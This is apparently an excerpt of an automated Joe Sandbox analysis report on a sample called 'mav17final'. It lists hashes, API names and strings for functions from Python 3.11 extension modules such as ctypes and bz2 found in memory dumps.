                                                  • Instruction ID: cdb02988190d50a224ca1079db819526259d7d25d5cf2cb549970717065ffcf9
                                                  • Opcode Fuzzy Hash: 56d4fabad618d8a5c8e6f1fde8dcb41e7996936431b442245916351dcbdf5c73
                                                  • Instruction Fuzzy Hash: A8212C61A08F8282EA449F6EE8400B92760EF85BE6F186136DF1D873A5DF3CE485C300
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dealloc$Arg_FromLongLong_ParseTuple
                                                  • String ID: OO:CopyComPointer
                                                  • API String ID: 1908940310-822416302
                                                  • Opcode ID: a50de67720cd425b58803957e1784c7b340943145018a53cdb6de08dc5e3c1c0
                                                  • Instruction ID: 18f4d6887c94b095f77d5b3bc51ee7d7b102e856c4cfaff675c673e48978d74e
                                                  • Opcode Fuzzy Hash: a50de67720cd425b58803957e1784c7b340943145018a53cdb6de08dc5e3c1c0
                                                  • Instruction Fuzzy Hash: D821F532A08B8685EB558F79DC401B82775AB88BF9F086636DB5D57B98CF3CE045D210
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dict_Err_NextString
                                                  • String ID: args not a tuple?$too many initializers
                                                  • API String ID: 1977209248-2791065560
                                                  • Opcode ID: f4fd08385035d02860af40dbb96f0e851c8c10ea306c559d0ae5fa500cb6d0af
                                                  • Instruction ID: 6aabb2aca38c9abeb29e13bb4ec2109c51a446ff96f45be186497c3c31cd3e53
                                                  • Opcode Fuzzy Hash: f4fd08385035d02860af40dbb96f0e851c8c10ea306c559d0ae5fa500cb6d0af
                                                  • Instruction Fuzzy Hash: CC217F61A08BC281EA508F19E4403B967A0FB45BF5F146236EB6D53BE5CF2CD499C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: CloseErrorHandleLastOpenProcess
                                                  • String ID: OpenProcess$automatically set for PID 0
                                                  • API String ID: 3453201768-2746090705
                                                  • Opcode ID: 44ebf947db6b65e1c872427e22240e614757305328dfd4b20febe6f3e275686b
                                                  • Instruction ID: dd879f538bfdcb5a8f1a499b2382a62e34ce0883b6b79a7138f326f78a826e75
                                                  • Opcode Fuzzy Hash: 44ebf947db6b65e1c872427e22240e614757305328dfd4b20febe6f3e275686b
                                                  • Instruction Fuzzy Hash: 4F117011F0C6C682EF549F2EE8841799AA1AFA9BE0F444035EB0D47795EE2CE8478700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072911922.00007FF8B90C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B90C0000, based on PE: true
                                                  • Associated: 00000002.00000002.2072881040.00007FF8B90C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072963464.00007FF8B90CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072997412.00007FF8B90D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073022810.00007FF8B90D2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b90c0000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Arg_$CheckErr_KeywordsLong_OccurredPositional
                                                  • String ID: BZ2Compressor
                                                  • API String ID: 1699739194-1096114097
                                                  • Opcode ID: 428fb968040cf0367ecb5975a9571f17589fde077a9351a0a9a78da93643c136
                                                  • Instruction ID: 42f66e4202d63bb0111d0f9ce07d6499ef7bcc9e0fc5a9b5f59375a5d98bd822
                                                  • Opcode Fuzzy Hash: 428fb968040cf0367ecb5975a9571f17589fde077a9351a0a9a78da93643c136
                                                  • Instruction Fuzzy Hash: 1D113031B086C286EE209F6DA44017A62B0FF94BD0F544535DB5E87A95DF2CE48E9610
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Arg_AuditDeallocFromLongLong_ParseSys_Tuple
                                                  • String ID: ctypes.set_errno
                                                  • API String ID: 928689845-1564666054
                                                  • Opcode ID: 59a8a5489d63178a80b732e192b127fc94092e90c4c175c04c3ca01ed042f338
                                                  • Instruction ID: 84ea74b960b6ebb74176d2c9e353d63ac1b74071344a60671312147b7f8e6083
                                                  • Opcode Fuzzy Hash: 59a8a5489d63178a80b732e192b127fc94092e90c4c175c04c3ca01ed042f338
                                                  • Instruction Fuzzy Hash: 97116562F18BC2D2EF548F69E8844B92BA1EF497E2F586035DB4D47350DE2CE595C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Arg_AuditDeallocFromLongLong_ParseSys_Tuple
                                                  • String ID: ctypes.set_last_error
                                                  • API String ID: 928689845-913187751
                                                  • Opcode ID: f23f19bccc13864e0ba767f98ec326220a154fbbf3424597505e894eb8dd0003
                                                  • Instruction ID: f66729374bc23507b7e1c5044efa5754909e02bf4494d41081e2883a5d4ffa51
                                                  • Opcode Fuzzy Hash: f23f19bccc13864e0ba767f98ec326220a154fbbf3424597505e894eb8dd0003
                                                  • Instruction Fuzzy Hash: 61116562F18BC2D2EF548F69E8844B92BA1EF4A7E2F586035DB0D47391DE2CE595C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_FormatSubtypeType_Unicode_strchr
                                                  • String ID: 'out' parameter %d must be a pointer type, not %s$PzZ
                                                  • API String ID: 3500358371-2360062653
                                                  • Opcode ID: fceb702919c06022e64addd7c9aaba2d34447d85d2b2cb0159e7ba4236f850e0
                                                  • Instruction ID: 7fa99d759dd0d06fd4138bc4cdfa4a564c733b1ad73f52bf22848139d1cef3df
                                                  • Opcode Fuzzy Hash: fceb702919c06022e64addd7c9aaba2d34447d85d2b2cb0159e7ba4236f850e0
                                                  • Instruction Fuzzy Hash: 75111921A0CB8791EB509F69E48067827A0EF86BEBF486031DF4D473A5DE6CE844C300
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_FormatSubtypeType_Unicode_strchr
                                                  • String ID: cast() argument 2 must be a pointer type, not %s$sPzUZXO
                                                  • API String ID: 3500358371-1038790478
                                                  • Opcode ID: 00c494f3386268376c83a7897981a44eeb5e2169e225d7a55c5354403a66d736
                                                  • Instruction ID: 867d0bb9d2a7eeafe09d4cb5e277787cd32380d1b686f2a0417a9a225e4ae458
                                                  • Opcode Fuzzy Hash: 00c494f3386268376c83a7897981a44eeb5e2169e225d7a55c5354403a66d736
                                                  • Instruction Fuzzy Hash: A6110A61A08BC291FA549F5DD8506B827A0AF95FE6F486035CF4D877A5EF2CE884C310
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072911922.00007FF8B90C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B90C0000, based on PE: true
                                                  • Associated: 00000002.00000002.2072881040.00007FF8B90C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072963464.00007FF8B90CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072997412.00007FF8B90D1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073022810.00007FF8B90D2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b90c0000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_StringThread_allocate_lockThread_free_lockmemset
                                                  • String ID: Unable to allocate lock$compresslevel must be between 1 and 9
                                                  • API String ID: 681419693-2500606449
                                                  • Opcode ID: 60b2f2588c32191dab62882afd88846cf50051bc512abb92ff4babc415602f46
                                                  • Instruction ID: 85914b0421d80093e926ad86113b1951b2182f474074a45c00085def155c11dd
                                                  • Opcode Fuzzy Hash: 60b2f2588c32191dab62882afd88846cf50051bc512abb92ff4babc415602f46
                                                  • Instruction Fuzzy Hash: 75110A31A18A8692EF009F2DE48037C63B8FF94B98F504135DB1D466A4EF3CE89AC350
                                                  APIs
                                                  • PyObject_GetAttrString.PYTHON311(?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F64FA8
                                                  • PyDict_New.PYTHON311(?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F64FBC
                                                  • PyErr_NewException.PYTHON311(?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F64FDA
                                                    • Part of subcall function 00007FF8B9F65028: PyType_Ready.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F6504E
                                                    • Part of subcall function 00007FF8B9F65028: PyType_Ready.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F65065
                                                    • Part of subcall function 00007FF8B9F65028: PyType_Ready.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F6507D
                                                    • Part of subcall function 00007FF8B9F65028: PyType_Ready.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F650A0
                                                    • Part of subcall function 00007FF8B9F65028: PyType_Ready.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F650C6
                                                    • Part of subcall function 00007FF8B9F65028: PyType_Ready.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F650EC
                                                    • Part of subcall function 00007FF8B9F65028: PyType_Ready.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F65112
                                                    • Part of subcall function 00007FF8B9F65028: PyType_Ready.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F65138
                                                    • Part of subcall function 00007FF8B9F65028: PyType_Ready.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F6515E
                                                    • Part of subcall function 00007FF8B9F65028: PyType_Ready.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F65181
                                                    • Part of subcall function 00007FF8B9F65028: PyModule_AddType.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F651A7
                                                    • Part of subcall function 00007FF8B9F65028: PyModule_AddType.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F651CD
                                                    • Part of subcall function 00007FF8B9F65028: PyModule_AddType.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F651F3
                                                    • Part of subcall function 00007FF8B9F65028: PyModule_AddType.PYTHON311(?,?,00000000,00007FF8B9F64FF4,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F65219
                                                    • Part of subcall function 00007FF8B9F65304: PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F6532F
                                                    • Part of subcall function 00007FF8B9F65304: PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F65366
                                                    • Part of subcall function 00007FF8B9F65304: PyLong_FromLong.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F6538B
                                                    • Part of subcall function 00007FF8B9F65304: PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F653AA
                                                    • Part of subcall function 00007FF8B9F65304: PyLong_FromLong.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F653CC
                                                    • Part of subcall function 00007FF8B9F65304: PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F653EB
                                                    • Part of subcall function 00007FF8B9F65304: PyLong_FromLong.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F6540D
                                                    • Part of subcall function 00007FF8B9F65304: PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F6542C
                                                    • Part of subcall function 00007FF8B9F65304: PyLong_FromLong.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F65451
                                                    • Part of subcall function 00007FF8B9F65304: PyModule_AddObjectRef.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F65470
                                                    • Part of subcall function 00007FF8B9F65304: PyLong_FromLong.PYTHON311(?,?,00000000,00007FF8B9F6500E,?,?,?,00007FF8B9F64F7C), ref: 00007FF8B9F65495
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Module_ReadyType_$Object$FromLongLong_$Type$AttrDict_Err_ExceptionObject_String
                                                  • String ID: _unpickle$ctypes.ArgumentError
                                                  • API String ID: 4217053054-165408235
                                                  • Opcode ID: 32827969c832a808a66d5017e69f26ea533dafa79bf6c295bc1895e8a6d04efa
                                                  • Instruction ID: cc6a013d884a46fce7c448a51f75d1ba44c0a66fec81e4e5c8ab4a2281887996
                                                  • Opcode Fuzzy Hash: 32827969c832a808a66d5017e69f26ea533dafa79bf6c295bc1895e8a6d04efa
                                                  • Instruction Fuzzy Hash: B9014C30A19F83A2FA509F6DEA801342AA8AF4A7F2F491134CB1C513A1EF3DE054C210
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dealloc$Dict_Err_ItemUnraisableWrite
                                                  • String ID: on calling _ctypes.DictRemover
                                                  • API String ID: 2766432985-2232269487
                                                  • Opcode ID: 256ea331e05c61a4a808f1e36cd886345c9bade03a7633d5d0aea444e30aedf2
                                                  • Instruction ID: dac86fe1d6dbdfdac3826892e910dd672eb4080727f6344bd0e062f57a4cdddc
                                                  • Opcode Fuzzy Hash: 256ea331e05c61a4a808f1e36cd886345c9bade03a7633d5d0aea444e30aedf2
                                                  • Instruction Fuzzy Hash: E001ED62E49A8285FF598F7DD85433C2260EF55BE6F186631CB1E157A0CF2CD565C340
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: FormatFromUnicode_$Dealloc
                                                  • String ID: %s(%R)$<%s object at %p>
                                                  • API String ID: 1714529502-296555854
                                                  • Opcode ID: 7e64ef3b32a657b11c2f44244a8f51ce1e0c9cec8aec46fab4d60a3fe1e5b4e0
                                                  • Instruction ID: da7511c7cce5cc6edcd0f2802d73430aed6815ea78b78dbdcaac48fe1ed736f0
                                                  • Opcode Fuzzy Hash: 7e64ef3b32a657b11c2f44244a8f51ce1e0c9cec8aec46fab4d60a3fe1e5b4e0
                                                  • Instruction Fuzzy Hash: AA010862A09E8281EE049F6AE8800AD6760FF58FE6B086137CF0D07365DE3CE895C300
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_File_ObjectPrintS_vsnprintfStringSys_Write
                                                  • String ID: stderr
                                                  • API String ID: 1103062482-1769798200
                                                  • Opcode ID: 9a0837009893c9ce3f6b921fad968050c61bacc10e62fde9b4fb5cee5af4f5c7
                                                  • Instruction ID: 8f710989a4fa7053e1afd3fc0c8b436cf643ad359956fef7d52b70ff3eac726e
                                                  • Opcode Fuzzy Hash: 9a0837009893c9ce3f6b921fad968050c61bacc10e62fde9b4fb5cee5af4f5c7
                                                  • Instruction Fuzzy Hash: F9011E22A18FC591EA208F14F8993B97760FF9AB96F580036CB8D43364DF3CE554C640
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_Format$memcpy
                                                  • String ID: bytes too long (%zd, maximum length %zd)$expected bytes, %s found
                                                  • API String ID: 437140070-1985973764
                                                  • Opcode ID: d9cd41fcd4a9d7115470baacfbcd2da228f5ee59300fb10d52ed7cf167236025
                                                  • Instruction ID: 8cdfb763ead6ca94aa6217b29d432c578025b27f023b2eef63b3dea093897cb4
                                                  • Opcode Fuzzy Hash: d9cd41fcd4a9d7115470baacfbcd2da228f5ee59300fb10d52ed7cf167236025
                                                  • Instruction Fuzzy Hash: 99012CA1E08BC2D5EA409F5DE8902782760AF56BF6F646232CB1D533D4CE2CE889C301
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073245464.00007FF8B9841000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8B9840000, based on PE: true
                                                  • Associated: 00000002.00000002.2073221006.00007FF8B9840000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073274420.00007FF8B9843000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073310530.00007FF8B9845000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073339457.00007FF8B9846000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9840000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Module_$FromInternObjectStateStringUnicode_
                                                  • String ID: close$error
                                                  • API String ID: 4029360594-371397155
                                                  • Opcode ID: d1d56f56bfa3555b9ef12796d8bede51d7c66017a5d4b22be61f28461ee977ed
                                                  • Instruction ID: e0867d4ee9dd6caaf1bfe116473171cbc5a2e4d8abd85aeee47c5a0dad188f2f
                                                  • Opcode Fuzzy Hash: d1d56f56bfa3555b9ef12796d8bede51d7c66017a5d4b22be61f28461ee977ed
                                                  • Instruction Fuzzy Hash: ECF03421B09B8793EA058F6DFA550793360BF09BD4B088237EB2D477A4DE3CE0588300
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: AuditErr_StringSubtypeSys_Type_
                                                  • String ID: (O)$ctypes.addressof$invalid type
                                                  • API String ID: 288810468-3457326693
                                                  • Opcode ID: 1ed79e3af6a29a22ef0b12f793c3d6b77dfb8862b8c0b7dc43e2b4ad75ba5f26
                                                  • Instruction ID: aa3bdec4b24bae6751f1ab40d19965c582be8d3b76ebeb8417222f9195224aab
                                                  • Opcode Fuzzy Hash: 1ed79e3af6a29a22ef0b12f793c3d6b77dfb8862b8c0b7dc43e2b4ad75ba5f26
                                                  • Instruction Fuzzy Hash: 40F08251B08E8392FF488F2AFC800742750AF48BEAF185031CB1D8A361EE2CE185C310
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Heap$CloseFreeHandleProcessService
                                                  • String ID: (sk)$continue_pending
                                                  • API String ID: 1635794000-3850771874
